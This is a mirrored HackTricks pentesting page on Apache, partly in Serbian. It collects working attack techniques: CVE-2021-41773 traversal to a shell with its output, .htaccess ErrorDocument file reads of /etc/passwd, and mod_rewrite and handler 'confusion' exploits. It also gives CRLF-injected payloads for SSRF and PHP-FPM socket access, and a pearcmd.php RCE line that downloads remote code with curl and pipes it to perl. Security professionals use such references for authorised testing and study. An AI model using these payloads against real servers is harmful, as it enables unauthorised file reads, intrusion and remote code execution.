mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
278 lines
14 KiB
Markdown
278 lines
14 KiB
Markdown
# Apache
|
||
|
||
{{#include ../../banners/hacktricks-training.md}}
|
||
|
||
## Izvršne PHP ekstenzije
|
||
|
||
Proverite koje ekstenzije izvršava Apache server. Da biste ih pronašli, možete izvršiti:
|
||
```bash
|
||
grep -R -B1 "httpd-php" /etc/apache2
|
||
```
|
||
Takođe, neka mesta na kojima možete pronaći ovu konfiguraciju su:
|
||
```bash
|
||
/etc/apache2/mods-available/php5.conf
|
||
/etc/apache2/mods-enabled/php5.conf
|
||
/etc/apache2/mods-available/php7.3.conf
|
||
/etc/apache2/mods-enabled/php7.3.conf
|
||
```
|
||
## CVE-2021-41773
|
||
```bash
|
||
curl http://172.18.0.15/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh --data 'echo Content-Type: text/plain; echo; id; uname'
|
||
uid=1(daemon) gid=1(daemon) groups=1(daemon)
|
||
Linux
|
||
```
|
||
## LFI putem .htaccess ErrorDocument file provider (ap_expr)
|
||
|
||
Ako možete kontrolisati .htaccess direktorijuma i AllowOverride uključuje FileInfo za taj put, možete pretvoriti 404 odgovore u proizvoljna čitanja lokalnih fajlova koristeći ap_expr file() funkciju unutar ErrorDocument.
|
||
|
||
- Zahtevi:
|
||
- Apache 2.4 sa omogućеним expression parserom (ap_expr) (podrazumevano u 2.4).
|
||
- vhost/dir mora dozvoliti .htaccess da postavi ErrorDocument (AllowOverride FileInfo).
|
||
- Korisnik koji pokreće Apache mora imati prava čitanja na ciljani fajl.
|
||
|
||
.htaccess payload:
|
||
```apache
|
||
# Optional marker header just to identify your tenant/request path
|
||
Header always set X-Debug-Tenant "demo"
|
||
# On any 404 under this directory, return the contents of an absolute filesystem path
|
||
ErrorDocument 404 %{file:/etc/passwd}
|
||
```
|
||
Aktivirajte to tako što ćete zatražiti bilo koju nepostojeću putanju ispod tog direktorijuma, na primer kada zloupotrebljavate userdir-style hosting:
|
||
```bash
|
||
curl -s http://target/~user/does-not-exist | sed -n '1,20p'
|
||
```
|
||
Napomene i saveti:
|
||
- Only absolute paths work. The content is returned as the response body for the 404 handler.
|
||
- Efektivna prava za čitanje su prava Apache user-a (tipično www-data/apache). Nećete moći da pročitate /root/* ili /etc/shadow u podrazumevanim podešavanjima.
|
||
- Čak i ako je .htaccess u vlasništvu root-a, ako je roditeljski direktorijum u vlasništvu tenant-a i dozvoljava rename, možda ćete moći da preimenujete originalni .htaccess i otpremite sopstvenu zamenu putem SFTP/FTP:
|
||
- rename .htaccess .htaccess.bk
|
||
- put your malicious .htaccess
|
||
- Iskoristite ovo da pročitate izvor aplikacije ispod DocumentRoot ili vhost config putanja kako biste prikupili tajne (DB creds, API keys, itd.).
|
||
|
||
## Confusion Attack <a href="#a-whole-new-attack-confusion-attack" id="a-whole-new-attack-confusion-attack"></a>
|
||
|
||
These types of attacks has been introduced and documented [**by Orange in this blog post**](https://blog.orange.tw/2024/08/confusion-attacks-en.html?m=1) and the following is a summary. The "confusion" attack basically abuses how the tens of modules that work together creating a Apache don't work perfectly synchronised and making some of them modify some unexpected data can cause a vulnerability in a later module.
|
||
|
||
### Filename Confusion
|
||
|
||
#### Truncation
|
||
|
||
The **`mod_rewrite`** will trim the content of `r->filename` after the character `?` ([_**modules/mappers/mod_rewrite.c#L4141**_](https://github.com/apache/httpd/blob/2.4.58/modules/mappers/mod_rewrite.c#L4141)). This isn't totally wrong as most modules will treat `r->filename` as an URL. Bur in other occasions this will be treated as file path, which would cause a problem.
|
||
|
||
### Path Truncation
|
||
|
||
It's possible to abuse `mod_rewrite` like in the following rule example to access other files inside the file system, removing the last part of the expected path adding simply a `?`:
|
||
```bash
|
||
RewriteEngine On
|
||
RewriteRule "^/user/(.+)$" "/var/user/$1/profile.yml"
|
||
|
||
# Expected
|
||
curl http://server/user/orange
|
||
# the output of file `/var/user/orange/profile.yml`
|
||
|
||
# Attack
|
||
curl http://server/user/orange%2Fsecret.yml%3F
|
||
# the output of file `/var/user/orange/secret.yml`
|
||
```
|
||
- **Mislead RewriteFlag Assignment**
|
||
|
||
U sledećem rewrite pravilu, sve dok URL završava sa .php biće tretiran i izvršen kao php. Stoga je moguće poslati URL koji se završava sa .php nakon znaka `?` dok u putanju učitavate drugačiji tip fajla (like an image) sa zlonamernim php kodom unutra:
|
||
```bash
|
||
RewriteEngine On
|
||
RewriteRule ^(.+\.php)$ $1 [H=application/x-httpd-php]
|
||
|
||
# Attacker uploads a gif file with some php code
|
||
curl http://server/upload/1.gif
|
||
# GIF89a <?=`id`;>
|
||
|
||
# Make the server execute the php code
|
||
curl http://server/upload/1.gif%3fooo.php
|
||
# GIF89a uid=33(www-data) gid=33(www-data) groups=33(www-data)
|
||
```
|
||
#### **ACL Bypass**
|
||
|
||
Moguće je pristupiti fajlovima kojima korisnik ne bi trebalo da može pristupiti, čak i kada pristup treba biti onemogućen konfiguracijama poput:
|
||
```xml
|
||
<Files "admin.php">
|
||
AuthType Basic
|
||
AuthName "Admin Panel"
|
||
AuthUserFile "/etc/apache2/.htpasswd"
|
||
Require valid-user
|
||
</Files>
|
||
```
|
||
Ovo je zato što PHP-FPM po podrazumevanju prima URL-ove koji se završavaju na `.php`, kao `http://server/admin.php%3Fooo.php`, i zato što PHP-FPM uklanja sve što dolazi posle karaktera `?`, pomenuti URL će omogućiti učitavanje `/admin.php` čak i ako je prethodno pravilo to zabranilo.
|
||
|
||
### Zbunjenost oko DocumentRoot
|
||
```bash
|
||
DocumentRoot /var/www/html
|
||
RewriteRule ^/html/(.*)$ /$1.html
|
||
```
|
||
Zanimljivost vezana za Apache je da prethodni rewrite pokušava da pristupi fajlu i iz documentRoot i iz root. Dakle, zahtev za `https://server/abouth.html` će proveriti fajl u `/var/www/html/about.html` i `/about.html` u file system-u. Što u suštini može da se zloupotrebi za pristup fajlovima u file system-u.
|
||
|
||
#### **Otkrivanje izvornog koda na serverskoj strani**
|
||
|
||
- **Otkrivanje izvornog koda CGI**
|
||
|
||
Dovoljno je dodati %3F na kraj da bi se desio leak izvornog koda cgi modula:
|
||
```bash
|
||
curl http://server/cgi-bin/download.cgi
|
||
# the processed result from download.cgi
|
||
curl http://server/html/usr/lib/cgi-bin/download.cgi%3F
|
||
# #!/usr/bin/perl
|
||
# use CGI;
|
||
# ...
|
||
# # the source code of download.cgi
|
||
```
|
||
- **Otkrivanje PHP Source Code**
|
||
|
||
Ako server ima više domena, pri čemu je jedan od njih statički domen, to se može zloupotrebiti da se pretraži fajl sistem i leak php code:
|
||
```bash
|
||
# Leak the config.php file of the www.local domain from the static.local domain
|
||
curl http://www.local/var/www.local/config.php%3F -H "Host: static.local"
|
||
# the source code of config.php
|
||
```
|
||
#### **Local Gadgets Manipulation**
|
||
|
||
Glavni problem prethodnog napada je što će, po podrazumevanoj konfiguraciji, većina pristupa fajl sistemu biti odbijena, kao u Apache HTTP Server’s [configuration template](https://github.com/apache/httpd/blob/trunk/docs/conf/httpd.conf.in#L115):
|
||
```xml
|
||
<Directory />
|
||
AllowOverride None
|
||
Require all denied
|
||
</Directory>
|
||
```
|
||
Međutim, [Debian/Ubuntu](https://sources.debian.org/src/apache2/2.4.62-1/debian/config-dir/apache2.conf.in/#L165) operativni sistemi podrazumevano dozvoljavaju `/usr/share`:
|
||
```xml
|
||
<Directory /usr/share>
|
||
AllowOverride None
|
||
Require all granted
|
||
</Directory>
|
||
```
|
||
Therefore, it would be possible to **abuse files located inside `/usr/share` in these distributions.**
|
||
|
||
**Lokalni gadget za Information Disclosure**
|
||
|
||
- **Apache HTTP Server** with **websocketd** may expose the **dump-env.php** script at **/usr/share/doc/websocketd/examples/php/**, which can leak sensitive environment variables.
|
||
- Servers with **Nginx** or **Jetty** might expose sensitive web application information (e.g., **web.xml**) through their default web roots placed under **/usr/share**:
|
||
- **/usr/share/nginx/html/**
|
||
- **/usr/share/jetty9/etc/**
|
||
- **/usr/share/jetty9/webapps/**
|
||
|
||
**Lokalni gadget za XSS**
|
||
|
||
- On Ubuntu Desktop with **LibreOffice installed**, exploiting the help files' language switch feature can lead to **Cross-Site Scripting (XSS)**. Manipulating the URL at **/usr/share/libreoffice/help/help.html** can redirect to malicious pages or older versions through **unsafe RewriteRule**.
|
||
|
||
**Lokalni gadget za LFI**
|
||
|
||
- If PHP or certain front-end packages like **JpGraph** or **jQuery-jFeed** are installed, their files can be exploited to read sensitive files like **/etc/passwd**:
|
||
- **/usr/share/doc/libphp-jpgraph-examples/examples/show-source.php**
|
||
- **/usr/share/javascript/jquery-jfeed/proxy.php**
|
||
- **/usr/share/moodle/mod/assignment/type/wims/getcsv.php**
|
||
|
||
**Lokalni gadget za SSRF**
|
||
|
||
- Utilizing **MagpieRSS's magpie_debug.php** at **/usr/share/php/magpierss/scripts/magpie_debug.php**, an SSRF vulnerability can be easily created, providing a gateway to further exploits.
|
||
|
||
**Lokalni gadget za RCE**
|
||
|
||
- Opportunities for **Remote Code Execution (RCE)** are vast, with vulnerable installations like an outdated **PHPUnit** or **phpLiteAdmin**. These can be exploited to execute arbitrary code, showcasing the extensive potential of local gadgets manipulation.
|
||
|
||
#### **Jailbreak iz lokalnih gadgeta**
|
||
|
||
It's also possible to jailbreak from the allowed folders by following symlinks generated by installed software in those folders, like:
|
||
|
||
- **Cacti Log**: `/usr/share/cacti/site/` -> `/var/log/cacti/`
|
||
- **Solr Data**: `/usr/share/solr/data/` -> `/var/lib/solr/data`
|
||
- **Solr Config**: `/usr/share/solr/conf/` -> `/etc/solr/conf/`
|
||
- **MediaWiki Config**: `/usr/share/mediawiki/config/` -> `/var/lib/mediawiki/config/`
|
||
- **SimpleSAMLphp Config**: `/usr/share/simplesamlphp/config/` -> `/etc/simplesamlphp/`
|
||
|
||
Moreover, abusing symlinks it was possible to obtain **RCE in Redmine.**
|
||
|
||
### Handler Confusion <a href="#id-3-handler-confusion" id="id-3-handler-confusion"></a>
|
||
|
||
This attack exploits the overlap in functionality between the `AddHandler` and `AddType` directives, which both can be used to **enable PHP processing**. Originally, these directives affected different fields (`r->handler` and `r->content_type` respectively) in the server's internal structure. However, due to legacy code, Apache handles these directives interchangeably under certain conditions, converting `r->content_type` into `r->handler` if the former is set and the latter is not.
|
||
|
||
Moreover, in the Apache HTTP Server (`server/config.c#L420`), if `r->handler` is empty before executing `ap_run_handler()`, the server **uses `r->content_type` as the handler**, effectively making `AddType` and `AddHandler` identical in effect.
|
||
|
||
#### **Prepisivanje handler-a radi otkrivanja PHP izvornog koda**
|
||
|
||
In [**this talk**](https://web.archive.org/web/20210909012535/https://zeronights.ru/wp-content/uploads/2021/09/013_dmitriev-maksim.pdf), was presented a vulnerability where an incorrect `Content-Length` sent by a client can cause Apache to mistakenly **return the PHP source code**. This was because an error handling issue with ModSecurity and the Apache Portable Runtime (APR), where a double response leads to overwriting `r->content_type` to `text/html`.\
|
||
Because ModSecurity doesn't properly handle return values, it would return the PHP code and won't interpret it.
|
||
|
||
#### **Overwrite Handler to XXXX**
|
||
|
||
TODO: Orange hasn't disclose this vulnerability yet
|
||
|
||
### **Pozivanje proizvoljnih handler-a**
|
||
|
||
If an attacker is able to control the **`Content-Type`** header in a server response he is going to be able to **invoke arbitrary module handlers**. However, by the point the attacker controls this, most of the process of the request will be done. However, it's possible to **restart the request process abusing the `Location` header** because if the **r**eturned `Status` is 200 and the `Location` header starts with a `/`, the response is treated as a Server-Side Redirection and should be processed
|
||
|
||
According to [RFC 3875](https://datatracker.ietf.org/doc/html/rfc3875) (specification about CGI) in [Section 6.2.2](https://datatracker.ietf.org/doc/html/rfc3875#section-6.2.2) defines a Local Redirect Response behavior:
|
||
|
||
> The CGI script can return a URI path and query-string (‘local-pathquery’) for a local resource in a Location header field. This indicates to the server that it should reprocess the request using the path specified.
|
||
|
||
Therefore, to perform this attack is needed one of the following vulns:
|
||
|
||
- CRLF Injection in the CGI response headers
|
||
- SSRF with complete control of the response headers
|
||
|
||
#### **Proizvoljni handler za Information Disclosure**
|
||
|
||
For example `/server-status` should only be accessible locally:
|
||
```xml
|
||
<Location /server-status>
|
||
SetHandler server-status
|
||
Require local
|
||
</Location>
|
||
```
|
||
Moguće je pristupiti tome podešavanjem `Content-Type` na `server-status` i Location header-a koji počinje sa `/`.
|
||
```
|
||
http://server/cgi-bin/redir.cgi?r=http:// %0d%0a
|
||
Location:/ooo %0d%0a
|
||
Content-Type:server-status %0d%0a
|
||
%0d%0a
|
||
```
|
||
#### **Arbitrary Handler to Full SSRF**
|
||
|
||
Preusmeravanje na `mod_proxy` da bi se pristupilo bilo kom protokolu na bilo kom URL-u:
|
||
```
|
||
http://server/cgi-bin/redir.cgi?r=http://%0d%0a
|
||
Location:/ooo %0d%0a
|
||
Content-Type:proxy:
|
||
http://example.com/%3F
|
||
%0d%0a
|
||
%0d%0a
|
||
```
|
||
Međutim, header `X-Forwarded-For` je dodat, što onemogućava pristup krajnjim tačkama metapodataka cloud-a.
|
||
|
||
#### **Arbitrarni handler za pristup lokalnom Unix Domain Socket-u**
|
||
|
||
Pristupite lokalnom Unix Domain Socket-u PHP-FPM-a da biste izvršili PHP backdoor koji se nalazi u `/tmp/`:
|
||
```
|
||
http://server/cgi-bin/redir.cgi?r=http://%0d%0a
|
||
Location:/ooo %0d%0a
|
||
Content-Type:proxy:unix:/run/php/php-fpm.sock|fcgi://127.0.0.1/tmp/ooo.php %0d%0a
|
||
%0d%0a
|
||
```
|
||
#### **Arbitrary Handler to RCE**
|
||
|
||
Zvanična [PHP Docker](https://hub.docker.com/_/php) slika uključuje PEAR (`Pearcmd.php`), alat za upravljanje PHP paketima iz komandne linije, koji se može zloupotrebiti da bi se dobio RCE:
|
||
```
|
||
http://server/cgi-bin/redir.cgi?r=http://%0d%0a
|
||
Location:/ooo? %2b run-tests %2b -ui %2b $(curl${IFS}
|
||
orange.tw/x|perl
|
||
) %2b alltests.php %0d%0a
|
||
Content-Type:proxy:unix:/run/php/php-fpm.sock|fcgi://127.0.0.1/usr/local/lib/php/pearcmd.php %0d%0a
|
||
%0d%0a
|
||
```
|
||
Pogledajte [**Docker PHP LFI Summary**](https://www.leavesongs.com/PENETRATION/docker-php-include-getshell.html#0x06-pearcmdphp), koji je napisao [Phith0n](https://x.com/phithon_xg) za detalje ove tehnike.
|
||
|
||
## Izvori
|
||
|
||
- [https://blog.orange.tw/2024/08/confusion-attacks-en.html?m=1](https://blog.orange.tw/2024/08/confusion-attacks-en.html?m=1)
|
||
- [Apache 2.4 Custom Error Responses (ErrorDocument)](https://httpd.apache.org/docs/2.4/custom-error.html)
|
||
- [Apache 2.4 Expressions and functions (file:)](https://httpd.apache.org/docs/2.4/expr.html)
|
||
- [HTB Zero write-up: .htaccess ErrorDocument LFI and cron pgrep abuse](https://0xdf.gitlab.io/2025/08/12/htb-zero.html)
|
||
|
||
{{#include ../../banners/hacktricks-training.md}}
|